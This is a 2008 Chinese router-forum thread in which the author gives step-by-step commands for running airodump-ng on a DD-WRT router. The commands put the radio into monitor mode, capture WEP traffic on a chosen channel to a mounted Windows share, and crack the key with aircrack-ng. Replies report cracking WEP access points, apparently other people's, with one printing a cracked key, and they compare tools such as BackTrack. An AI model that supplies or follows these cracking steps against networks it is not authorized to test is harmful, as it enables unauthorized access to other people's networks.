以路由攻路由续集2

steeven

dd-wrt不支持injection注入，所以只能守株待兔。
在前传中使用了airserv-ng来作为抓包服务器，因为aircrack-ng升级，用最新的airodump-ng连上去抓包有误。所以这次直接编译airodump-ng到dd-wrt上面，出来的cap数据格式应该是标准的吧～

因为数据量比较大，建议抓到usb或者windows共享目录下面。(normal版支持cifs, mini版支持jffs)
这个airodump-ng不支持-ivs选项，因为没有加入crypt,ssl库。
建议使用mini版本开启jffs, 自动加载autoap.sh, 可以选择多个“可用”网络。
dd-wrt不要使用NEWD版本，打开monitor模式后会死机，目前是这样。

以下步骤都在dd-wrt上操作：
1. install vint mini version
http://www.dd-wrt.com/dd-wrtv2/d ... -9774_VINT_mini.bin
2. enable jffs, 复制文件到/jffs
http://steeven.8866.org:5080/steeven/cifs.o, http://steeven.8866.org:5080/steeven/mount.cifs, http://steeven.8866.org:5080/steeven/airodump-ng
chmod 555 *.*
4. 安装iwconfig网络配置工具（似乎是鸡肋）
cd /tmp
wget http://downloads.openwrt.org/whi ... 8.pre7-1_mipsel.ipk
ipkg install wireless-tools_28.pre7-1_mipsel.ipk
5. 连接/tmp/smshare到windows共享目录temp
cd /jffs
insmod cifs.o
mkdir /tmp/smbshare
/jffs/mount.cifs //192.168.187.101/temp /tmp/smbshare/ -o username=guest,password=
6. dd-wrt设置无线模式：ap, 频道：你的目标所在频道
7. wl monitor 1, 此时prism0虚拟网卡创建，ifconfig prism0应该能看到一些数据
8. /jffs/airodump-ng prism0 -w /tmp/smbshare/cap --channel 11
如果这个频道有很多不是WEP的杂乱数据，可以用--encrypt WEP来过滤一下

好了，等着抓吧～
破解还要说吗？aircrack-ng *.cap
祝大家好运～

[ 本帖最后由 steeven 于 2008-7-9 17:24 编辑 ]

pcer

以前《以路由攻路由》要电脑配合，现在只要路由器自己工作就可以了嘛？

steeven

如果你的路由内存够大，可以用/tmp目录保存数据
如果支持U盘，也不用电脑
拨号映射到ftp/ssh/nfs没有实验过
剩下最省事的就是开电脑，挂接windows共享目录

pcer

《路由攻路由一》原文片断
https://www.right.com.cn/forum/v ... &extra=page%3D3
5. 在电脑上下载http://lvdong.net/steeven/aircrack-ng-1.0-dev-win32.zip,

解压後进入cmd开始监听路由器上的无线数据：airodump-ng.exe 192.168.1.1:666 --channel 11 -w dump。这个就是我们熟悉的抓包了。我的路由器ip是192.168.1.1，你的ip自己看去。11也要替换成那个要干活的频道。注意因为dd-wrt不能注入，守株待兔一秒钟只有几个. 我这一天等到2w个。

6. 如果数据够了，运行aircrack-ng.exe dump*.cap。 等着看结果吧


以上应该是电脑来执行抓包程序，并且将数据存储在刚才执行抓包程序的目录下，也就是必须和路由器一起配合工作，你现在的方式好像可以在路由上抓包了，不需要电脑配合抓包了（前提是路由有空间存储数据）。当然最后不管是老模式还是新模式，解密码的工作还是由电脑完成，不知我的理解是否正确。

霏菲飞

太麻烦了。。。还是用BT3或者wifiway1.0，破WEP最多也就十多分钟的事情

steeven

原帖由 pcer 于 2008-6-25 11:48 发表
...
以上应该是电脑来执行抓包程序，并且将数据存储在刚才执行抓包程序的目录下，也就是必须和路由器一起配合工作，你现在的方式好像可以在路由上抓包了，不需要电脑配合抓包了（前提是路由有空间存储数据）。当然最后不管是老模式还是新模式，解密码的工作还是由电脑完成，不知我的理解是否正确。

非常正确，加十分！

解密需要ssl库，路由上折腾不开，所以就在电脑上玩吧。路由那个小CPU可能要跑很久，没有测试过。

之所以要用路由抓包，是因为很多人用的本本，内置天线信号不好。
路由一般信号和天线都比较好，个头小，可以放到很有利的位置上。
以后如果驱动支持注入了，路由的强大功率更能体现优势～

steeven

原帖由 霏菲飞 于 2008-6-25 13:49 发表
太麻烦了。。。还是用BT3或者wifiway1.0，破WEP最多也就十多分钟的事情

你也不是省油的灯啊～

不过你提醒了我，如果在电脑上去抓另外一个频道。。。双管齐下就好了，开着也是浪费电。我怎么这么笨呢？

pcer

已成功破解WEP。昨晚比较幸运，WEP AP有人下载，因此DATA飞涨。抓包只用了不到半小时，就1万5了，然后花十几秒，台式机破解成功。但是我用7231 -4p 64M ，运行抓包程序，CPU占用率很高，80-90%，频繁死机，大约每5分钟左右就死，还好抓的数据都在，只是需要手工重启，再打命令继续抓。

hick

守株待兔方式太麻烦
还是强破爽  

pcer

原帖由 hick 于 2008-6-26 13:41 发表
守株待兔方式太麻烦
还是强破爽  

我的网卡不支持注入啊，没办法的，刚才又破了一个TP-Link （WEP:1212121212），真爽

ctyy

....根本找不到WEP的玩，全是WPA……

霏菲飞

wpa考验的是字典。。。

海信

LZ说的这几款软件都很难下到，谁有打包好的？

mysy

好的网管怎么会用WEP，都是小白

33060

steeven兄:
能否介绍一下各步骤具体如何操作,不太看的明白,谢谢.